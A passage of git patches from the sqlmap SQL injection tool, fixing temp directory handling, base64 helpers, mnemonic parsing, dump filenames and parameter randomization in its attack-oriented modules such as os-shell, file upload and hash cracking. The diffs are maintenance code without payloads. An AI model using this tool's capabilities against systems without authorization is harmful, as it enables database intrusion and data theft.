         items.insert(0, _)
 
     for dbms, aliases, Handler, Connector in items:
-        if conf.dbms and conf.dbms.lower() != dbms.lower():
+        if conf.dbms and conf.dbms.lower() != dbms and conf.dbms.lower() not in aliases:
             debugMsg = "skipping test for %s" % dbms
             logger.debug(debugMsg)
             continue

From 7bcb3ce599201373fa1fe5e3de0bc5c8d51330b4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 8 Jan 2015 09:22:47 +0100
Subject: [PATCH 289/492] Patch for an Issue #1099

---
 lib/core/common.py | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index b1e48e919..972f09334 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3278,7 +3278,10 @@ def expandMnemonics(mnemonics, parser, args):
                     if opt.startswith(name):
                         options[opt] = option
 
-            if name in options:
+            if not options:
+                warnMsg = "mnemonic '%s' can't be resolved" % name
+                logger.warn(warnMsg)
+            elif name in options:
                 found = name
                 debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
                 logger.debug(debugMsg)
@@ -3288,7 +3291,8 @@ def expandMnemonics(mnemonics, parser, args):
                 warnMsg += "Resolved to shortest of those ('%s')" % found
                 logger.warn(warnMsg)
 
-            found = options[found]
+            if found:
+                found = options[found]
         else:
             found = pointer.current[0]
             debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)

From f96f33a9841a70a178a1858a4816e525b8e1c858 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 8 Jan 2015 22:15:04 +0100
Subject: [PATCH 290/492] Fix for an Issue #1100

---
 lib/utils/hash.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/utils/hash.py b/lib/utils/hash.py
index bf3312c89..bc3f06f2a 100644
--- a/lib/utils/hash.py
+++ b/lib/utils/hash.py
@@ -957,7 +957,7 @@ def dictionaryAttack(attack_dict):
 
     if len(hash_regexes) == 0:
         warnMsg = "unknown hash format. "
-        warnMsg += "Please report by e-mail to %s" % ML
+        warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
         logger.warn(warnMsg)
 
     if len(results) == 0:

From 8e03f4db0f8f313a1c967d7f3f33e7cddcb906ae Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Fri, 9 Jan 2015 15:33:53 +0100
Subject: [PATCH 291/492] Patch for an Issue #1062

---
 lib/core/settings.py   |  3 +++
 lib/request/connect.py | 38 ++++++++++++++++++++++++++++++++++++--
 2 files changed, 39 insertions(+), 2 deletions(-)

diff --git a/lib/core/settings.py b/lib/core/settings.py
index c0a6ae523..3d1460c3b 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -611,6 +611,9 @@ MIN_ENCODED_LEN_CHECK = 5
 # Timeout in seconds in which Metasploit remote session has to be initialized
 METASPLOIT_SESSION_TIMEOUT = 300
 
+# Suffix used to mark variables having keyword names
+EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
+
 # Reference: http://www.cookiecentral.com/faq/#3.5
 NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index fa17c28a9..9c9b097f3 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -5,8 +5,10 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import compiler
 import httplib
 import json
+import keyword
 import logging
 import re
 import socket
@@ -72,6 +74,7 @@ from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
 from lib.core.settings import DEFAULT_CONTENT_TYPE
 from lib.core.settings import DEFAULT_COOKIE_DELIMITER
 from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+from lib.core.settings import EVALCODE_KEYWORD_SUFFIX
 from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE
 from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
 from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE
@@ -831,23 +834,54 @@ class Connect(object):
             delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER
             variables = {"uri": uri}
             originals = {}
+            keywords = keyword.kwlist
 
             for item in filter(None, (get, post if not kb.postHint else None)):
                 for part in item.split(delimiter):
                     if '=' in part:
                         name, value = part.split('=', 1)
+                        name = name.strip()
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus))
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        evaluateCode("%s=%s" % (name, repr(value)), variables)
 
             if cookie:
                 for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER):
                     if '=' in part:
                         name, value = part.split('=', 1)
+                        name = name.strip()
+                        if name in keywords:
+                            name = "%s%s" % (name, EVALCODE_KEYWORD_SUFFIX)
                         value = urldecode(value, convall=True)
-                        evaluateCode("%s=%s" % (name.strip(), repr(value)), variables)
+                        evaluateCode("%s=%s" % (name, repr(value)), variables)
+
+            while True:
+                try:
+                    compiler.parse(conf.evalCode.replace(';', '\n'))
+                except SyntaxError, ex:
+                    original = replacement = ex.text.strip()
+                    for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
+                        if _ in keywords:
+                            replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
+                            break
+                    if original == replacement:
+                        conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
+                        break
+                    else:
+                        conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
+                else:
+                    break
 
             originals.update(variables)
             evaluateCode(conf.evalCode, variables)
+
+            for variable in variables.keys():
+                if variable.endswith(EVALCODE_KEYWORD_SUFFIX):
+                    value = variables[variable]
+                    del variables[variable]
+                    variables[variable.replace(EVALCODE_KEYWORD_SUFFIX, "")] = value
+
             uri = variables["uri"]
 
             for name, value in variables.items():

From 06ff8b3a167a9854c96a3072680eb9ba00dc4233 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 13 Jan 2015 10:33:51 +0100
Subject: [PATCH 292/492] Patch for an Issue #1105

---
 lib/core/bigarray.py |  3 +--
 lib/core/option.py   | 13 +++++++++++++
 lib/core/settings.py |  3 ---
 sqlmap.py            |  9 ++-------
 4 files changed, 16 insertions(+), 12 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 01b45992a..08b621433 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -17,7 +17,6 @@ import tempfile
 
 from lib.core.exception import SqlmapSystemException
 from lib.core.settings import BIGARRAY_CHUNK_SIZE
-from lib.core.settings import BIGARRAY_TEMP_PREFIX
 
 DEFAULT_SIZE_OF = sys.getsizeof(object())
 
@@ -92,7 +91,7 @@ class BigArray(list):
 
     def _dump(self, chunk):
         try:
-            handle, filename = tempfile.mkstemp(prefix=BIGARRAY_TEMP_PREFIX)
+            handle, filename = tempfile.mkstemp()
             self.filenames.add(filename)
             os.close(handle)
             with open(filename, "w+b") as fp:
diff --git a/lib/core/option.py b/lib/core/option.py
index bc5f68768..b51622641 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -15,6 +15,7 @@ import re
 import socket
 import string
 import sys
+import tempfile
 import threading
 import time
 import urllib2
@@ -1437,6 +1438,17 @@ def _checkDependencies():
     if conf.dependencies:
         checkDependencies()
 
+def _createTemporaryDirectory():
+    """
+    Creates temporary directory for this run.
+    """
+
+    if not os.path.isdir(tempfile.gettempdir()):
+        os.makedirs(tempfile.gettempdir())
+    tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+    if not os.path.isdir(tempfile.tempdir):
+        os.makedirs(tempfile.tempdir)
+
 def _cleanupOptions():
     """
     Cleanup configuration attributes.
@@ -2332,6 +2344,7 @@ def init():
     _cleanupOptions()
     _purgeOutput()
     _checkDependencies()
+    _createTemporaryDirectory()
     _basicOptionValidation()
     _setProxyList()
     _setTorProxySettings()
diff --git a/lib/core/settings.py b/lib/core/settings.py
index 3d1460c3b..b91a36f38 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -446,9 +446,6 @@ ROTATING_CHARS = ('\\', '|', '|', '/', '-')
 # Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)
 BIGARRAY_CHUNK_SIZE = 1024 * 1024
 
-# Prefix used for storing dumped chunks in BigArray objects
-BIGARRAY_TEMP_PREFIX = "sqlmapba-%d-" % os.getpid()
-
 # Only console display last n table rows
 TRIM_STDOUT_DUMP_SIZE = 256
 
diff --git a/sqlmap.py b/sqlmap.py
index 1c949f95c..0c20bb1eb 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -6,11 +6,11 @@ See the file 'doc/COPYING' for copying permission
 """
 
 import bdb
-import glob
 import inspect
 import logging
 import os
 import re
+import shutil
 import sys
 import tempfile
 import time
@@ -44,7 +44,6 @@ from lib.core.exception import SqlmapUserQuitException
 from lib.core.option import initOptions
 from lib.core.option import init
 from lib.core.profiling import profile
-from lib.core.settings import BIGARRAY_TEMP_PREFIX
 from lib.core.settings import LEGAL_DISCLAIMER
 from lib.core.testing import smokeTest
 from lib.core.testing import liveTest
@@ -154,11 +153,7 @@ def main():
         if conf.get("showTime"):
             dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
-        for filename in glob.glob("%s*" % os.path.join(tempfile.gettempdir(), BIGARRAY_TEMP_PREFIX)):
-            try:
-                os.remove(filename)
-            except:
-                pass
+        shutil.rmtree(tempfile.tempdir, ignore_errors=True)
 
         kb.threadContinue = False
         kb.threadException = True

From f9a9ededb1b10d2fa76da3e0432d92411f35f601 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 14 Jan 2015 05:16:32 +0100
Subject: [PATCH 293/492] Patch for an Issue #1106

---
 lib/core/option.py | 3 ++-
 sqlmap.py          | 3 ++-
 2 files changed, 4 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index b51622641..03c5b5300 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1445,7 +1445,7 @@ def _createTemporaryDirectory():
 
     if not os.path.isdir(tempfile.gettempdir()):
         os.makedirs(tempfile.gettempdir())
-    tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
+    kb.tempDir = tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
     if not os.path.isdir(tempfile.tempdir):
         os.makedirs(tempfile.tempdir)
 
@@ -1772,6 +1772,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
     kb.storeHashesChoice = None
     kb.suppressResumeInfo = False
     kb.technique = None
+    kb.tempDir = None
     kb.testMode = False
     kb.testQueryCount = 0
     kb.testType = None
diff --git a/sqlmap.py b/sqlmap.py
index 0c20bb1eb..c01bab3ad 100755
--- a/sqlmap.py
+++ b/sqlmap.py
@@ -153,7 +153,8 @@ def main():
         if conf.get("showTime"):
             dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True)
 
-        shutil.rmtree(tempfile.tempdir, ignore_errors=True)
+        if kb.get("tempDir"):
+            shutil.rmtree(kb.tempDir, ignore_errors=True)
 
         kb.threadContinue = False
         kb.threadException = True

From 7e7513aa5e6ea99a4bf566c7c38869e95ad63490 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 14 Jan 2015 05:30:08 +0100
Subject: [PATCH 294/492] Patch for an Issue #1107

---
 lib/core/option.py | 12 ++++++++++--
 1 file changed, 10 insertions(+), 2 deletions(-)

diff --git a/lib/core/option.py b/lib/core/option.py
index 03c5b5300..6ab4e8d93 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1443,8 +1443,16 @@ def _createTemporaryDirectory():
     Creates temporary directory for this run.
     """
 
-    if not os.path.isdir(tempfile.gettempdir()):
-        os.makedirs(tempfile.gettempdir())
+    try:
+        if not os.path.isdir(tempfile.gettempdir()):
+            os.makedirs(tempfile.gettempdir())
+    except IOError, ex:
+        errMsg = "there has been a problem while accessing "
+        errMsg += "system's temporary directory location(s) ('%s'). Please " % ex
+        errMsg += "make sure that there is enough disk space left. If problem persists, "
+        errMsg += "try to set environment variable 'TMP' to a location "
+        errMsg += "writeable by the current user"
+        raise SqlmapSystemException, errMsg
     kb.tempDir = tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
     if not os.path.isdir(tempfile.tempdir):
         os.makedirs(tempfile.tempdir)

From 7388c3bf492796a608bb830efd56a7dff73f4161 Mon Sep 17 00:00:00 2001
From: nixawk <hap.ddup@gmail.com>
Date: Wed, 14 Jan 2015 09:40:24 +0000
Subject: [PATCH 295/492] datatype.py

---
 lib/core/datatype.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index 8fb16268b..29295727b 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -75,7 +75,7 @@ class AttribDict(dict):
         for attr in dir(self):
             if not attr.startswith('_'):
                 value = getattr(self, attr)
-                if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
+                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
                     setattr(retVal, attr, copy.deepcopy(value, memo))
 
         for key, value in self.items():

From 570d30789b0bbde915173c192d30c831fe1cec63 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 14 Jan 2015 13:53:38 +0100
Subject: [PATCH 296/492] Patch for an Issue #1113

---
 lib/core/bigarray.py | 7 +++++--
 lib/core/option.py   | 3 ++-
 2 files changed, 7 insertions(+), 3 deletions(-)

diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py
index 08b621433..0e42433d8 100644
--- a/lib/core/bigarray.py
+++ b/lib/core/bigarray.py
@@ -97,9 +97,12 @@ class BigArray(list):
             with open(filename, "w+b") as fp:
                 pickle.dump(chunk, fp, pickle.HIGHEST_PROTOCOL)
             return filename
-        except IOError, ex:
+        except (OSError, IOError), ex:
             errMsg = "exception occurred while storing data "
-            errMsg += "to a temporary file ('%s')" % ex
+            errMsg += "to a temporary file ('%s'). Please " % ex
+            errMsg += "make sure that there is enough disk space left. If problem persists, "
+            errMsg += "try to set environment variable 'TEMP' to a location "
+            errMsg += "writeable by the current user"
             raise SqlmapSystemException, errMsg
 
     def _checkcache(self, index):
diff --git a/lib/core/option.py b/lib/core/option.py
index 6ab4e8d93..29b06c434 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1450,9 +1450,10 @@ def _createTemporaryDirectory():
         errMsg = "there has been a problem while accessing "
         errMsg += "system's temporary directory location(s) ('%s'). Please " % ex
         errMsg += "make sure that there is enough disk space left. If problem persists, "
-        errMsg += "try to set environment variable 'TMP' to a location "
+        errMsg += "try to set environment variable 'TEMP' to a location "
         errMsg += "writeable by the current user"
         raise SqlmapSystemException, errMsg
+
     kb.tempDir = tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid()))
     if not os.path.isdir(tempfile.tempdir):
         os.makedirs(tempfile.tempdir)

From 54e9a1fb2d4ccbd393bc03d272f4e18a979efa42 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Wed, 14 Jan 2015 16:11:55 +0100
Subject: [PATCH 297/492] Minor style update

---
 lib/request/methodrequest.py | 5 ++---
 1 file changed, 2 insertions(+), 3 deletions(-)

diff --git a/lib/request/methodrequest.py b/lib/request/methodrequest.py
index 0ad3744b6..5fd203561 100644
--- a/lib/request/methodrequest.py
+++ b/lib/request/methodrequest.py
@@ -7,11 +7,10 @@ See the file 'doc/COPYING' for copying permission
 
 import urllib2
 
-
 class MethodRequest(urllib2.Request):
-    '''
+    """
     Used to create HEAD/PUT/DELETE/... requests with urllib2
-    '''
+    """
 
     def set_method(self, method):
         self.method = method.upper()

From ccbe424e23fbbe8821dee95332a2770ab7d9b507 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 15 Jan 2015 12:42:32 +0100
Subject: [PATCH 298/492] Patch for an Issue #1115

---
 lib/parse/cmdline.py        | 1 +
 lib/takeover/abstraction.py | 4 ++++
 2 files changed, 5 insertions(+)

diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index d2171ea39..6cda6f500 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -817,6 +817,7 @@ def cmdLineParser():
 
                 try:
                     command = raw_input("sqlmap-shell> ").strip()
+                    command = getUnicode(command, encoding=sys.stdin.encoding)
                 except (KeyboardInterrupt, EOFError):
                     print
                     raise SqlmapShellQuitException
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index dd44fdafb..20ff60fc5 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -5,10 +5,13 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import sys
+
 from extra.safe2bin.safe2bin import safechardecode
 from lib.core.common import dataToStdout
 from lib.core.common import Backend
 from lib.core.common import getSQLSnippet
+from lib.core.common import getUnicode
 from lib.core.common import isStackingAvailable
 from lib.core.common import readInput
 from lib.core.data import conf
@@ -125,6 +128,7 @@ class Abstraction(Web, UDF, Xp_cmdshell):
 
             try:
                 command = raw_input("os-shell> ")
+                command = getUnicode(command, encoding=sys.stdin.encoding)
             except KeyboardInterrupt:
                 print
                 errMsg = "user aborted"

From 1dd2b7acebe8c7d103109db72d99eda3e91752b8 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 15 Jan 2015 14:01:19 +0100
Subject: [PATCH 299/492] Important fix for dumping location of
 databases/tables with international letters

---
 lib/core/dump.py | 28 +++++++++++++++++++++++++---
 1 file changed, 25 insertions(+), 3 deletions(-)

diff --git a/lib/core/dump.py b/lib/core/dump.py
index 8da0c2c62..09b590624 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -7,6 +7,7 @@ See the file 'doc/COPYING' for copying permission
 
 import cgi
 import codecs
+import hashlib
 import os
 import re
 import tempfile
@@ -21,7 +22,9 @@ from lib.core.common import normalizeUnicode
 from lib.core.common import openFile
 from lib.core.common import prioritySortColumns
 from lib.core.common import randomInt
+from lib.core.common import randomStr
 from lib.core.common import safeCSValue
+from lib.core.common import unicodeencode
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -380,6 +383,7 @@ class Dump(object):
         rtable = None
         dumpFP = None
         appendToFile = False
+        warnFile = False
 
         if tableValues is None:
             return
@@ -393,7 +397,13 @@ class Dump(object):
             self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
             return
 
-        dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db))))
+        _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
+        if len(_) < len(db):
+            _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+            dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
+            warnFile = True
+        else:
+            dumpDbPath = os.path.join(conf.dumpPath, _)
 
         if conf.dumpFormat == DUMP_FORMAT.SQLITE:
             replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
@@ -418,7 +428,14 @@ class Dump(object):
 
                     dumpDbPath = tempDir
 
-            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (normalizeUnicode(unsafeSQLIdentificatorNaming(table)), conf.dumpFormat.lower()))
+            _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+            if len(_) < len(table):
+                _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+                dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
+                warnFile = True
+            else:
+                dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
+
             appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
             dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
 
@@ -604,7 +621,12 @@ class Dump(object):
             else:
                 dataToDumpFile(dumpFP, "\n")
             dumpFP.close()
-            logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
+
+            msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
+            if not warnFile:
+                logger.info(msg)
+            else:
+                logger.warn(msg)
 
     def dbColumns(self, dbColumnsDict, colConsider, dbs):
         if hasattr(conf, "api"):

From 20a9d94f565da0b2049de7e91166feebff48895b Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 15 Jan 2015 17:32:07 +0100
Subject: [PATCH 300/492] Patch for an Issue #1117

---
 lib/core/convert.py | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/lib/core/convert.py b/lib/core/convert.py
index 6b54d0c33..ffe55ef07 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -5,6 +5,7 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import base64
 import json
 import pickle
 import sys
@@ -20,7 +21,7 @@ def base64decode(value):
     'foobar'
     """
 
-    return value.decode("base64")
+    return base64.b64decode("base64")
 
 def base64encode(value):
     """
@@ -30,7 +31,7 @@ def base64encode(value):
     'Zm9vYmFy'
     """
 
-    return value.encode("base64")[:-1].replace("\n", "")
+    return base64.b64encode(value)
 
 def base64pickle(value):
     """

From da737d23ed1ea494fa50e6512765d9e6537cd9e9 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Thu, 15 Jan 2015 17:34:14 +0100
Subject: [PATCH 301/492] Fixing a leftover for #1117

---
 lib/core/convert.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/core/convert.py b/lib/core/convert.py
index ffe55ef07..8f7123a00 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -21,7 +21,7 @@ def base64decode(value):
     'foobar'
     """
 
-    return base64.b64decode("base64")
+    return base64.b64decode(value)
 
 def base64encode(value):
     """

From c2b2ccd2b597a4593e13f30395674a695ae8b1a3 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 17 Jan 2015 17:31:00 +0100
Subject: [PATCH 302/492] Minor bug fix

---
 lib/request/connect.py | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 9c9b097f3..808bd0222 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -304,8 +304,12 @@ class Connect(object):
                         get = urlencode(get, limit=True)
 
                 if get:
-                    url = "%s?%s" % (url, get)
-                    requestMsg += "?%s" % get
+                    if '?' in url:
+                        url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get)
+                        requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get)
+                    else:
+                        url = "%s?%s" % (url, get)
+                        requestMsg += "?%s" % get
 
                 if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET:
                     post = conf.parameters[PLACE.POST]

From e73ac6c8e309a6957a4414b5326765b4dd0681c4 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Sat, 17 Jan 2015 21:47:57 +0100
Subject: [PATCH 303/492] Minor patch on request of an user

---
 lib/core/common.py     |  2 ++
 lib/request/connect.py | 10 ++++++----
 2 files changed, 8 insertions(+), 4 deletions(-)

diff --git a/lib/core/common.py b/lib/core/common.py
index 972f09334..872b949fd 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -3360,6 +3360,8 @@ def randomizeParameterValue(value):
 
     retVal = value
 
+    value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
+
     for match in re.finditer('[A-Z]+', value):
         retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
 
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 808bd0222..6779707e7 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -818,21 +818,23 @@ class Connect(object):
         if conf.rParam:
             def _randomizeParameter(paramString, randomParameter):
                 retVal = paramString
-                match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
+                match = re.search(r"(\A|\b)%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString)
                 if match:
                     origValue = match.group("value")
-                    retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
+                    retVal = re.sub(r"(\A|\b)%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString)
                 return retVal
 
             for randomParameter in conf.rParam:
-                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE):
+                for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE, PLACE.URI, PLACE.CUSTOM_POST):
                     if item in conf.parameters:
                         if item == PLACE.GET and get:
                             get = _randomizeParameter(get, randomParameter)
-                        elif item == PLACE.POST and post:
+                        elif item in (PLACE.POST, PLACE.CUSTOM_POST) and post:
                             post = _randomizeParameter(post, randomParameter)
                         elif item == PLACE.COOKIE and cookie:
                             cookie = _randomizeParameter(cookie, randomParameter)
+                        elif item == PLACE.URI and uri:
+                            uri = _randomizeParameter(uri, randomParameter)
 
         if conf.evalCode:
             delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER

From 393659ffbfdcb0462d9663a4ba0e7138ceb3fb31 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 19 Jan 2015 09:17:16 +0100
Subject: [PATCH 304/492] Patch for an Issue #1121

---
 lib/takeover/web.py                   | 3 +++
 thirdparty/multipart/multipartpost.py | 7 ++++---
 2 files changed, 7 insertions(+), 3 deletions(-)

diff --git a/lib/takeover/web.py b/lib/takeover/web.py
index b6bf9ff41..601351296 100644
--- a/lib/takeover/web.py
+++ b/lib/takeover/web.py
@@ -213,6 +213,9 @@ class Web:
             if success:
                 break
 
+            if not directory:
+                continue
+
             uploaded = False
             directory = ntToPosixSlashes(normalizePath(directory))
 
diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py
index 2863b8580..e9aa1a85e 100644
--- a/thirdparty/multipart/multipartpost.py
+++ b/thirdparty/multipart/multipartpost.py
@@ -81,9 +81,10 @@ class MultipartPostHandler(urllib2.BaseHandler):
             buf = ''
 
         for (key, value) in vars:
-            buf += '--%s\r\n' % boundary
-            buf += 'Content-Disposition: form-data; name="%s"' % key
-            buf += '\r\n\r\n' + value + '\r\n'
+            if key is not None and value is not None:
+                buf += '--%s\r\n' % boundary
+                buf += 'Content-Disposition: form-data; name="%s"' % key
+                buf += '\r\n\r\n' + value + '\r\n'
 
         for (key, fd) in files:
             file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len

From a66b0c91bb25429b3bfdbc0473db8ca37ad4b314 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Mon, 19 Jan 2015 09:19:30 +0100
Subject: [PATCH 305/492] Patch for an Issue #1120

---
 lib/core/target.py | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/core/target.py b/lib/core/target.py
index 7ddb2eab6..bd6379e14 100644
--- a/lib/core/target.py
+++ b/lib/core/target.py
@@ -595,7 +595,7 @@ def _createTargetDirs():
         except (OSError, IOError), ex:
             try:
                 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-            except IOError, _:
+            except Exception, _:
                 errMsg = "unable to write to the temporary directory ('%s'). " % _
                 errMsg += "Please make sure that your disk is not full and "
                 errMsg += "that you have sufficient write permissions to "
@@ -617,7 +617,7 @@ def _createTargetDirs():
         except (OSError, IOError), ex:
             try:
                 tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
-            except IOError, _:
+            except Exception, _:
                 errMsg = "unable to write to the temporary directory ('%s'). " % _
                 errMsg += "Please make sure that your disk is not full and "
                 errMsg += "that you have sufficient write permissions to "

From a603002acdb0ffadb4c77cc19ccd6c7a50433e2a Mon Sep 17 00:00:00 2001
From: Miroslav Stampar <miroslav.stampar@gmail.com>
Date: Tue, 20 Jan 2015 09:38:18 +0100
Subject: [PATCH 306/492] Adding a choice to automatically turn on
 --identify-waf if protection has been detected

---
 lib/controller/checks.py | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 9a5f147c3..8681cc229 100644
--- a/lib/controller/checks.py
